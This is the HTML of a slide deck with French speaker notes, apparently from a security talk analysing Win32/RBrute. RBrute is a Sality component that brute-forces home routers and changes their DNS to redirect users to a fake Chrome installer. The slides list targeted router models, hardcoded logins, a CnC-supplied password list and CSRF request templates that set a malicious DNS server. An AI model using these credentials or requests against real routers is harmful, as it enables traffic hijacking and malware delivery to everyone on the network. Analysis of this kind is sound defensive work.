<section id="_win32_rbrute_targets"><h2>Win32/RBrute Targets</h2><div class="listingblock"><div class="content"><pre class="highlight"><code class="shell language-shell">$ strings rbrute.exe
[...]
TD-W8901G
TD-W8901GB
TD-W8951ND
TD-W8961ND
TD-8840T
TD-W8961ND
TD-8816
TD-8817
TD-W8151N
TD-W8101G
ZXDSL 831CII
ZXV10 W300
[...]
DSL-2520U
DSL-2600U
DSL router
TD-W8901G
TD-W8901G 3.0
TD-W8901GB
TD-W8951ND
TD-W8961ND
TD-8840T
TD-8840T 2.0
TD-W8961ND
TD-8816
TD-8817 2.0
TD-8817
TD-W8151N
TD-W8101G
ZXDSL 831CII
[...]</code></pre></div></div>
<aside class="notes"><div class="ulist"><ul><li><p>La liste des routeurs supportée est facilement trouvable dans le binaire grâce à la commande strings.</p></li><li><p>Ceci reste une liste non exhaustive, on peut voir que les routeurs dlink tplink ou encore ZTE sont ciblés.</p></li></ul></div></aside></section>
<section id="_win32_rbrute_bruteforce"><h2>Win32/RBrute Bruteforce</h2><div class="ulist"><ul><li><p>Logins: <code>admin</code>, <code>support</code>, <code>root</code> & <code>Administrator</code></p></li><li><p>Password list retrieved from the CnC</p></li></ul></div>
<div class="listingblock"><div class="content"><pre class="highlight"><code><empty string>
111111
12345
123456
12345678
abc123
admin
Administrator
consumer
dragon
gizmodo
iqrquksm
letmein
lifehack
monkey
password
qwerty
root
soporteETB2006
support
tadpassword
trustno1
we0Qilhxtx4yLGZPhokY</code></pre></div></div>
<aside class="notes"><div class="ulist"><ul><li><p>Une fois le rapport envoyé le CnC renvoie une liste de mot de passe.</p></li><li><p>Couplé aux logins code en dur dans le binaire il va bruteforcer le formulaire d’authentification du routeur.</p></li></ul></div></aside></section>
<section id="_win32_rbrute_changing_dns"><h2>Win32/RBrute Changing DNS</h2><div class="listingblock oversize2"><div class="content"><pre class="highlight"><code>http://<router_IP>/&dnsserver=<malicious_DNS>&dnsserver2=8.8.8.8&Save=Save
http://<router_IP>/dnscfg.cgi?dnsPrimary=<malicious_DNS>&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
http://<router_IP>/Enable_DNSFollowing=1&dnsPrimary=<malicious_DNS>&dnsSecondary=8.8.8.8</code></pre></div></div>
<aside class="notes"><div class="ulist"><ul><li><p>Enfin, il utilise une CSRF pour modifier le DNS primaire et secondaire.</p></li><li><p>Les requêtes sont assez explicites comme on peut le voir.</p></li></ul></div></aside></section>
<section id="_win32_rbrute_next_step"><h2>Win32/RBrute Next Step</h2><div class="ulist"><ul><li><p>Simple redirection to fake Chrome installer (facebook or google domains)</p></li><li><p>Install (user action required)</p></li><li><p>Change primary DNS on the computer (via key registry)</p></li></ul></div>
<div class="listingblock"><div class="content"><pre class="highlight"><code>HKLM/SYSTEM/ControlSet001/Services/Tcpip/Parameters/Interfaces/{network interface UUID}/NameServer = “8.8.8.8”</code></pre></div></div>
<aside class="notes"><div class="ulist"><ul><li><p>A partir de maintenant a chaque fois que l’utilisateur veut aller sur FB ou Google il sera automatiquement redirigé vers une fake page de Chrome Installer</p></li><li><p>L’installation du fake Chrome requiere quand meme l’action de l’utilisateur</p></li><li><p>Apres l’installation Sality change le DNS de Windows via la clef de registre.</p></li></ul></div></aside></section>
<section id="_why_reinfect_someone_by_rbrute_and_not_sality"><h2>Why reinfect someone by RBrute and not Sality?</h2><aside class="notes"><div class="paragraph"><p>Pourquoi infecté un utilisateur avec RBrute alors qu’il peut etre infecté par Sality?</p></div></aside></section>
<section id="_win32_rbrute_in_a_coffee_shop"><h2>Win32/RBrute In A Coffee Shop</h2><div class="ulist"><ul><li><p>Infected user</p></li><li><p>Infected router</p></li><li><p>Everyone is infected</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>Imaginons un instant que l’utilisateur en question se trouve dans un coffee internet.</p></li><li><p>Un utilisateur se connecte au WIFI.</p></li><li><p>Il se fait accidentellement/ou non infecter par Rbrute.</p></li><li><p>Celui ci change le DNS du routeur.</p></li><li><p>Redirigeant ainsi toute personne utilisant le WIFI</p></li><li><p>Ceci lui permet aisément d’infecter des victimes qu’il n’aurait pas pu avoir.</p></li></ul></div></aside></section>
<section id="_rbrute_and_sality"><h2>RBrute and Sality</h2><div class="paragraph"><p><span class="image"><img src="images/hf/sality_overall.png" alt="sality overall" /></span></p></div>
<aside class="notes"><div class="ulist"><ul><li><p>Ce schéma représente le taux de détection de Sality.</p></li><li><p>le pic vers Déc. 2013 représente la sortie du nouveau composant.</p></li><li><p>Il faut rappeler que l’attaque est aggressive comparer a Moose 4logins 10psswd.</p></li></ul></div></aside></section>
<section id="_conclusion"><h2>Conclusion</h2><div class="paragraph"><p>Embedded malware</p></div>
<div class="ulist"><ul><li><p>Not yet complex</p></li><li><p>Tools and processes need to catch up</p></li><li><p>a low hanging fruit</p></li><li><p>Prevention simple</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>Threats are not as advanced or complex as their Windows counterparts</p></li><li><p>Our tools, visibility and processes will need to be improved</p></li><li><p>Routers and IoT industry are a low hanging fruit for malware operators these days</p></li><li><p>Often times prevention is as simple as changing your default username and password for a strong one</p><div class="ulist"><ul><li><p>That is, until there is another shellshock affecting all Linux-based
routers…​</p></li></ul></div></li><li><p>Friends don’t let friends run routers with default credentials</p></li></ul></div></aside></section>
<section id="_thanks"><h2>Thanks!</h2><div class="ulist"><ul><li><p>Thank you!</p></li><li><p>Special thanks to ESET Canada Research Team</p></li></ul></div></section>
<section id="_questions" data-background="#125F79"><h2>Questions?</h2><div class="listingblock oversize4"><div class="content"><pre class="highlight"><code>@obilodeau
@nyx__o</code></pre></div></div></section>
<section id="_references"><h2>References</h2><div class="ulist"><ul><li><p><a href="http://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pdf" class="bare">http://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pdf</a></p></li><li><p><a href="http://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.html" class="bare">http://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.html</a></p></li><li><p><a href="https://gist.github.com/josephwegner/1d20f1ce1d59b61172e1" class="bare">https://gist.github.com/josephwegner/1d20f1ce1d59b61172e1</a></p></li><li><p><a href="http://www.welivesecurity.com/2014/04/02/win32sality-newest-component-a-routers-primary-dns-changer-named-win32rbrute/" class="bare">http://www.welivesecurity.com/2014/04/02/win32sality-newest-component-a-routers-primary-dns-changer-named-win32rbrute/</a></p></li></ul></div></section></div></div><script src="reveal.js/lib/js/head.min.js"></script><script src="reveal.js/js/reveal.js"></script><script>// See https://github.com/hakimel/reveal.js#configuration for a full list of configuration options
Reveal.initialize({
// Display controls in the bottom right corner
controls: false,
// Display a presentation progress bar
progress: true,
// Display the page number of the current slide
slideNumber: false,
// Push each slide change to the browser history
history: true,
// Enable keyboard shortcuts for navigation
keyboard: true,
// Enable the slide overview mode
overview: true,
// Vertical centering of slides
center: true,
// Enables touch navigation on devices with touch input
touch: true,
// Loop the presentation
loop: false,
// Change the presentation direction to be RTL
rtl: false,
// Turns fragments on and off globally
fragments: true,
// Flags if the presentation is running in an embedded mode,
// i.e. contained within a limited portion of the screen
embedded: false,
// Number of milliseconds between automatically proceeding to the
// next slide, disabled when set to 0, this value can be overwritten
// by using a data-autoslide attribute on your slides
autoSlide: 0,
// Stop auto-sliding after user input
autoSlideStoppable: true,
// Enable slide navigation via mouse wheel
mouseWheel: false,
// Hides the address bar on mobile devices
hideAddressBar: true,
// Opens links in an iframe preview overlay
previewLinks: false,
// Theme (e.g., beige, black, blood, league, moon, night, serif, simple, sky, solarized, white)
// NOTE setting the theme in the config no longer works in reveal.js 3.x
//theme: Reveal.getQueryHash().theme || 'owasp',
// Transition style (e.g., none, fade, slide, convex, concave, zoom)
transition: Reveal.getQueryHash().transition || 'none',
// Transition speed (e.g., default, fast, slow)
transitionSpeed: 'default',
// Transition style for full page slide backgrounds (e.g., none, fade, slide, convex, concave, zoom)
backgroundTransition: 'slide',
// Number of slides away from the current that are visible
viewDistance: 3,
// Parallax background image (e.g., "'https://s3.amazonaws.com/hakim-static/reveal-js/reveal-parallax-1.jpg'")
parallaxBackgroundImage: '',
// Parallax background size in CSS syntax (e.g., "2100px 900px")
parallaxBackgroundSize: '',
// The "normal" size of the presentation, aspect ratio will be preserved
// when the presentation is scaled to fit different resolutions. Can be
// specified using percentage units.
width: 960,
height: 700,
// Factor of the display size that should remain empty around the content
margin: 0.01,
// Bounds for smallest/largest possible scale to apply to content
minScale: 0.2,
maxScale: 1.5,
// Optional libraries used to extend on reveal.js
dependencies: [
{ src: 'reveal.js/lib/js/classList.js', condition: function() { return !document.body.classList; } },
{ src: 'reveal.js/plugin/markdown/marked.js', condition: function() { return !!document.querySelector( '[data-markdown]' ); } },
{ src: 'reveal.js/plugin/markdown/markdown.js', condition: function() { return !!document.querySelector( '[data-markdown]' ); } },
{ src: 'reveal.js/plugin/highlight/highlight.js', async: true, callback: function() { hljs.initHighlightingOnLoad(); } },
{ src: 'reveal.js/plugin/zoom-js/zoom.js', async: true, condition: function() { return !!document.body.classList; } },
{ src: 'reveal.js/plugin/notes/notes.js', async: true, condition: function() { return !!document.body.classList; } }
]
});</script></body></html>